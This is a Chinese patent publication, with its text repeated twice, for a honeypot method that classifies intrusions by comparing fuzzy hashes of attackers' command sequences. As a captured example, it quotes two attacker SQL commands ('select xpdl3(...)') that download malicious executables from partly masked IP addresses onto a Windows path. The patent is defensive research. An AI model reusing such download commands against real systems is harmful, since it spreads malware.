一种面向蜜罐系统进行入侵行为识别和分类的方法及系统的制作方法
一种面向蜜罐系统进行入侵行为识别和分类的方法及系统的制作方法
【技术领域】
[0001]本发明涉及网络安全技术领域,尤其涉及一种面向蜜罐系统进行入侵行为识别和分类的方法及系统。
【背景技术】
[0002]采用蜜罐技术可以一定程度地抵御未知攻击,并分担其它业务系统的受攻击风险。在网络安全领域的蜜罐一般指通过部署模拟正常的,有价值的网络节点,诱使黑客或恶意程序攻击,以暴露其黑客行径和攻击手段的目的。
[0003]当黑客对蜜罐系统进行入侵后,蜜罐会记录下黑客对系统发出的所有指令,这个指令序列我们称之为黑客的行为轨迹,它将作为入侵事件进行评估,网络环境分析的重要证据。
[0004]通过搭建模型系统,在真实的网络环境中进行采样,我们发现,存在大量的恶意事件都是以相似的手段进行入侵的,它们或是基于某类入侵框架工具,或是某些病毒生成器生产的恶意代码的通用行为,这类攻击事件往往仅仅在有效的攻击载荷上存在差异,此类事件作为证据属性的重要性是毋庸置疑的,但是相比较更为重要的具有首发性,个性化,针对性的事件也会淹没其中,如何将我们的关注点从泛型事件聚焦到此类具有首发性,个性化,针对性的事件上来将成为重中之重。
【发明内容】
[0005]本发明提供了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统,针对现有蜜罐系统存在的问题,提出基于全时序指令的模糊哈希值比较的方式,来识别新入侵事件是已有类型攻击事件,还是首发事件,从而辅助评估入侵事件的严重等级。
[0006]本发明采用如下方法来实现:一种面向蜜罐系统进行入侵行为识别和分类的方法,包括:
计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库;
捕获新入侵事件;
计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;
判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。
[0007]进一步地,若判定新入侵事件与所述已入侵事件属于同类型事件,则还包括:
计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。
[0008]进一步地,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
[0009]本发明采用如下系统来实现:一种面向蜜罐系统进行入侵行为识别和分类的系统,包括:
事件信息库生成模块,用于计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库;
入侵事件捕获模块,用于捕获新入侵事件;
相似度比较模块,用于计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;
类型识别模块,用于判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。
[0010]进一步地,若类型识别模块判定新入侵事件与所述已入侵事件属于同类型事件,则还包括新增攻击载荷定位模块:
计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。
[0011]进一步地,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
[0012]综上所述,本发明提供了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统,通过计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值形成事件信息库;如果捕获到新入侵事件,则计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的全时序指令的模糊哈希值进行比较,若存在相似度达到预设阈值的已入侵事件,则认为新入侵事件与所述已入侵事件为同类型事件,否则认定为首发事件。
[0013]本发明的有益效果为:通过计算已入侵事件和新入侵事件的全时序指令的模糊哈希值,从而利用模糊哈希值之间的比较来判断新入侵事件是否是已知类型事件,本发明通过量化比较的方法,有效感知首发事件,从而及时提交给应急响应人员进行分析。
【附图说明】
[0014]为了更清楚地说明本发明的技术方案,下面将对实施例中所需要使用的附图作简单地介绍,显而易见地,下面描述中的附图仅仅是本发明中记载的一些实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据这些附图获得其他的附图。
[0015]图1为本发明提供的一种面向蜜罐系统进行入侵行为识别和分类的方法实施例流程图;
图2为本发明提供的一种面向蜜罐系统进行入侵行为识别和分类的系统实施例结构图。
【具体实施方式】
[0016]本发明给出了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统,为了使本技术领域的人员更好地理解本发明实施例中的技术方案,并使本发明的上述目的、特征和优点能够更加明显易懂,下面结合附图对本发明中技术方案作进一步详细的说明:
本发明首先提供了一种面向蜜罐系统进行入侵行为识别和分类的方法实施例,如图1所示,包括:
S101计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库;
例如:我们的蜜罐系统捕获到了一次完整的入侵行为,它用38步向蜜罐系统发送了 38条指令,我们采用开源工具ssdeep中实现的模糊哈希算法,将这个具有时序性的38条语句作为对象进行计算模糊哈希值,假定为fhash_all。然后分别对这38条指令单独计算模糊哈希,假定为fhas_l, fhas_2......fhas_38。这些哈希值将作为我们队此次事件的量化依据;
上述入侵行为作为已入侵事件,已入侵事件可以为一个或者多个;
S102捕获新入侵事件;
S103计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;
例如:我们又捕获了一次新入侵事件,同样它也使用38步向蜜罐系统发送了 38条指令,我们采用上面的方法得到了本次具有时序性的38条语句作为对象进行计算模糊哈希,假定为 fhash_air ;
S104判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。
[0017]例如:通过对比fhash_all和fhash_all ’,发现他们的相似度很高;因此,认为这两次攻击事件属于同类型事件;
其中,所述首发事件是指在本系统的范围之内,此类型的攻击事件在此之前系统 内没有发生过。
[0018]优选地,若判定新入侵事件与所述已入侵事件属于同类型事件,则还包括:
计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。
[0019]例如:针对上述例子中的新入侵事件的38条指令单独计算模糊哈希,假定为 fhas_l,,fhas_2,......fhas_38,;将 fhas_l,,fhas_2,......fhas_38,分别跟
fhas_l, fhas_2......fhas_38按照笛卡尔积的方式两两进行相似度比较,发现仅fhsah_34’
跟fhas_l, fhas_2......fhas_38中的任何一个都不符合相似度关联;
对比发现两次事件的仅在一条指令上存在差异分别是“select xpdl3(’ http://117.XX.XX.173:3 389/04.exe,, ’ c: \ \i setup, exe,),,和 “select xpdl3(,http://218.XX.XX.238:7234/kfar.exe’ , ’ c: \\isetup.exe’) ”。从中可以看出两个入侵行为手段相同,仅仅在下载恶意代码的指令上存在差异。
[0020]优选地,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
[0021]本发明还提供了一种面向蜜罐系统进行入侵行为识别和分类的系统实施例,如图2所示,包括:
事件信息库生成模块201,用于计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库; 入侵事件捕获模块202,用于捕获新入侵事件;
相似度比较模块203,用于计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;
类型识别模块204,用于判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。
[0022]优选地,若类型识别模块判定新入侵事件与所述已入侵事件属于同类型事件,则还包括新增攻击载荷定位模块:
计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。
[0023]优选地,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
[0024]其中,上述方法和系统实施例中所述各单步指令,可以为每个步骤执行的指令,或者某些指令的集合。
[0025]如上所述,本发明给出了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统实施例,通过计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,对于捕获到的新入侵事件,同样计算其全时序指令的模糊哈希值,并将新入侵事件的模糊哈希值与已入侵事件的模糊哈希值进行比较,若与某个或者某些已入侵事件的相似度达到预设阈值,则认为新入侵事件与所述已入侵事件为同类型事件,否则认为新入侵事件为首发事件。更优选地,对于判定为同类型事件的新入侵事件,可以进行进一步识别,计算新入侵事件的各单步指令的模糊哈希值,与同类型的已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。本发明所述的技术方案不仅能够及时感知首发事件,并能进一步有效识别已入侵事件的新增攻击载荷。
[0026]以上实施例用以说明而非限制本发明的技术方案。不脱离本发明精神和范围的任何修改或局部替换,均应涵盖在本发明的权利要求范围当中。
【主权项】
1.一种面向蜜罐系统进行入侵行为识别和分类的方法,其特征在于,包括: 计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库; 捕获新入侵事件; 计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较; 判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。2.如权利要求1所述的方法,其特征在于,若判定新入侵事件与所述已入侵事件属于同类型事件,则还包括: 计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。3.如权利要求2所述的方法,其特征在于,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。4.一种面向蜜罐系统进行入侵行为识别和分类的系统,其特征在于,包括: 事件信息库生成模块,用于计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库; 入侵事件捕获模块,用于捕获新入侵事件; 相似度比较模块,用于计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较; 类型识别模块,用于判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。5.如权利要求4所述的系统,其特征在于,若类型识别模块判定新入侵事件与所述已入侵事件属于同类型事件,则还包括新增攻击载荷定位模块: 计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。6.如权利要求5所述的系统,其特征在于,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
【专利摘要】本发明公开了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统,首先,计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库;捕获新入侵事件;计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。本发明技术方案不仅可以有效拦截入侵事件,同时可以对新入侵事件进行类型识别,以便进行深入分析。
【IPC分类】G06F21/55
【公开号】CN105488394
【申请号】CN201410824968
【发明人】徐宝旺, 王维, 肖新光
【申请人】哈尔滨安天科技股份有限公司
【公开日】2016年4月13日
【申请日】2014年12月27日
【技术领域】
[0001]本发明涉及网络安全技术领域,尤其涉及一种面向蜜罐系统进行入侵行为识别和分类的方法及系统。
【背景技术】
[0002]采用蜜罐技术可以一定程度地抵御未知攻击,并分担其它业务系统的受攻击风险。在网络安全领域的蜜罐一般指通过部署模拟正常的,有价值的网络节点,诱使黑客或恶意程序攻击,以暴露其黑客行径和攻击手段的目的。
[0003]当黑客对蜜罐系统进行入侵后,蜜罐会记录下黑客对系统发出的所有指令,这个指令序列我们称之为黑客的行为轨迹,它将作为入侵事件进行评估,网络环境分析的重要证据。
[0004]通过搭建模型系统,在真实的网络环境中进行采样,我们发现,存在大量的恶意事件都是以相似的手段进行入侵的,它们或是基于某类入侵框架工具,或是某些病毒生成器生产的恶意代码的通用行为,这类攻击事件往往仅仅在有效的攻击载荷上存在差异,此类事件作为证据属性的重要性是毋庸置疑的,但是相比较更为重要的具有首发性,个性化,针对性的事件也会淹没其中,如何将我们的关注点从泛型事件聚焦到此类具有首发性,个性化,针对性的事件上来将成为重中之重。
【发明内容】
[0005]本发明提供了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统,针对现有蜜罐系统存在的问题,提出基于全时序指令的模糊哈希值比较的方式,来识别新入侵事件是已有类型攻击事件,还是首发事件,从而辅助评估入侵事件的严重等级。
[0006]本发明采用如下方法来实现:一种面向蜜罐系统进行入侵行为识别和分类的方法,包括:
计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库;
捕获新入侵事件;
计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;
判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。
[0007]进一步地,若判定新入侵事件与所述已入侵事件属于同类型事件,则还包括:
计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。
[0008]进一步地,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
[0009]本发明采用如下系统来实现:一种面向蜜罐系统进行入侵行为识别和分类的系统,包括:
事件信息库生成模块,用于计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库;
入侵事件捕获模块,用于捕获新入侵事件;
相似度比较模块,用于计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;
类型识别模块,用于判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。
[0010]进一步地,若类型识别模块判定新入侵事件与所述已入侵事件属于同类型事件,则还包括新增攻击载荷定位模块:
计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。
[0011]进一步地,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
[0012]综上所述,本发明提供了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统,通过计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值形成事件信息库;如果捕获到新入侵事件,则计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的全时序指令的模糊哈希值进行比较,若存在相似度达到预设阈值的已入侵事件,则认为新入侵事件与所述已入侵事件为同类型事件,否则认定为首发事件。
[0013]本发明的有益效果为:通过计算已入侵事件和新入侵事件的全时序指令的模糊哈希值,从而利用模糊哈希值之间的比较来判断新入侵事件是否是已知类型事件,本发明通过量化比较的方法,有效感知首发事件,从而及时提交给应急响应人员进行分析。
【附图说明】
[0014]为了更清楚地说明本发明的技术方案,下面将对实施例中所需要使用的附图作简单地介绍,显而易见地,下面描述中的附图仅仅是本发明中记载的一些实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据这些附图获得其他的附图。
[0015]图1为本发明提供的一种面向蜜罐系统进行入侵行为识别和分类的方法实施例流程图;
图2为本发明提供的一种面向蜜罐系统进行入侵行为识别和分类的系统实施例结构图。
【具体实施方式】
[0016]本发明给出了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统,为了使本技术领域的人员更好地理解本发明实施例中的技术方案,并使本发明的上述目的、特征和优点能够更加明显易懂,下面结合附图对本发明中技术方案作进一步详细的说明:
本发明首先提供了一种面向蜜罐系统进行入侵行为识别和分类的方法实施例,如图1所示,包括:
S101计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库;
例如:我们的蜜罐系统捕获到了一次完整的入侵行为,它用38步向蜜罐系统发送了 38条指令,我们采用开源工具ssdeep中实现的模糊哈希算法,将这个具有时序性的38条语句作为对象进行计算模糊哈希值,假定为fhash_all。然后分别对这38条指令单独计算模糊哈希,假定为fhas_l, fhas_2......fhas_38。这些哈希值将作为我们队此次事件的量化依据;
上述入侵行为作为已入侵事件,已入侵事件可以为一个或者多个;
S102捕获新入侵事件;
S103计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;
例如:我们又捕获了一次新入侵事件,同样它也使用38步向蜜罐系统发送了 38条指令,我们采用上面的方法得到了本次具有时序性的38条语句作为对象进行计算模糊哈希,假定为 fhash_air ;
S104判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。
[0017]例如:通过对比fhash_all和fhash_all ’,发现他们的相似度很高;因此,认为这两次攻击事件属于同类型事件;
其中,所述首发事件是指在本系统的范围之内,此类型的攻击事件在此之前系统 内没有发生过。
[0018]优选地,若判定新入侵事件与所述已入侵事件属于同类型事件,则还包括:
计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。
[0019]例如:针对上述例子中的新入侵事件的38条指令单独计算模糊哈希,假定为 fhas_l,,fhas_2,......fhas_38,;将 fhas_l,,fhas_2,......fhas_38,分别跟
fhas_l, fhas_2......fhas_38按照笛卡尔积的方式两两进行相似度比较,发现仅fhsah_34’
跟fhas_l, fhas_2......fhas_38中的任何一个都不符合相似度关联;
对比发现两次事件的仅在一条指令上存在差异分别是“select xpdl3(’ http://117.XX.XX.173:3 389/04.exe,, ’ c: \ \i setup, exe,),,和 “select xpdl3(,http://218.XX.XX.238:7234/kfar.exe’ , ’ c: \\isetup.exe’) ”。从中可以看出两个入侵行为手段相同,仅仅在下载恶意代码的指令上存在差异。
[0020]优选地,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
[0021]本发明还提供了一种面向蜜罐系统进行入侵行为识别和分类的系统实施例,如图2所示,包括:
事件信息库生成模块201,用于计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库; 入侵事件捕获模块202,用于捕获新入侵事件;
相似度比较模块203,用于计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;
类型识别模块204,用于判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。
[0022]优选地,若类型识别模块判定新入侵事件与所述已入侵事件属于同类型事件,则还包括新增攻击载荷定位模块:
计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。
[0023]优选地,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
[0024]其中,上述方法和系统实施例中所述各单步指令,可以为每个步骤执行的指令,或者某些指令的集合。
[0025]如上所述,本发明给出了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统实施例,通过计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,对于捕获到的新入侵事件,同样计算其全时序指令的模糊哈希值,并将新入侵事件的模糊哈希值与已入侵事件的模糊哈希值进行比较,若与某个或者某些已入侵事件的相似度达到预设阈值,则认为新入侵事件与所述已入侵事件为同类型事件,否则认为新入侵事件为首发事件。更优选地,对于判定为同类型事件的新入侵事件,可以进行进一步识别,计算新入侵事件的各单步指令的模糊哈希值,与同类型的已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。本发明所述的技术方案不仅能够及时感知首发事件,并能进一步有效识别已入侵事件的新增攻击载荷。
[0026]以上实施例用以说明而非限制本发明的技术方案。不脱离本发明精神和范围的任何修改或局部替换,均应涵盖在本发明的权利要求范围当中。
【主权项】
1.一种面向蜜罐系统进行入侵行为识别和分类的方法,其特征在于,包括: 计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库; 捕获新入侵事件; 计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较; 判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。2.如权利要求1所述的方法,其特征在于,若判定新入侵事件与所述已入侵事件属于同类型事件,则还包括: 计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。3.如权利要求2所述的方法,其特征在于,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。4.一种面向蜜罐系统进行入侵行为识别和分类的系统,其特征在于,包括: 事件信息库生成模块,用于计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库; 入侵事件捕获模块,用于捕获新入侵事件; 相似度比较模块,用于计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较; 类型识别模块,用于判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。5.如权利要求4所述的系统,其特征在于,若类型识别模块判定新入侵事件与所述已入侵事件属于同类型事件,则还包括新增攻击载荷定位模块: 计算新入侵事件的各单步指令的模糊哈希值,并与所述已入侵事件的各单步指令的模糊哈希值,按照笛卡尔积的方式两两进行相似度比较,找出新入侵事件中与所述已入侵事件的各单步指令都不具备关联的部分,则为该同类型事件的新增攻击载荷。6.如权利要求5所述的系统,其特征在于,将新入侵事件的全时序指令和各单步指令的模糊哈希值录入事件信息库。
【专利摘要】本发明公开了一种面向蜜罐系统进行入侵行为识别和分类的方法及系统,首先,计算所有已入侵事件的全时序指令和各单步指令的模糊哈希值,生成事件信息库;捕获新入侵事件;计算新入侵事件的全时序指令的模糊哈希值,并与事件信息库中的所有全时序指令的模糊哈希值进行相似度比较;判断是否存在相似度达到预设阈值的已入侵事件,若存在,则新入侵事件与所述已入侵事件属于同类型事件,否则新入侵事件为首发事件。本发明技术方案不仅可以有效拦截入侵事件,同时可以对新入侵事件进行类型识别,以便进行深入分析。
【IPC分类】G06F21/55
【公开号】CN105488394
【申请号】CN201410824968
【发明人】徐宝旺, 王维, 肖新光
【申请人】哈尔滨安天科技股份有限公司
【公开日】2016年4月13日
【申请日】2014年12月27日
最新回复(0)